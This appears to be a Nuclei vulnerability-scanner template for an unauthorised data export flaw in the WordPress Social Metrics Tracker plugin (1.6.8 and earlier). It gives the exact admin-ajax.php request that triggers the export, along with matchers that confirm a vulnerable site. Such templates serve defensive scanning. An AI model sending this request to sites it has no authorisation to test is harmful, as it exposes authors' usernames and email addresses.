30 lines
866 B
YAML
30 lines
866 B
YAML
id: wordpress-social-metrics-tracker
|
|
|
|
info:
|
|
name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
|
|
author: randomrobbie
|
|
severity: medium
|
|
description: |
|
|
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
|
|
tags: wordpress,wp-plugin,wp,unauth,wpscan
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Main URL to Post"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|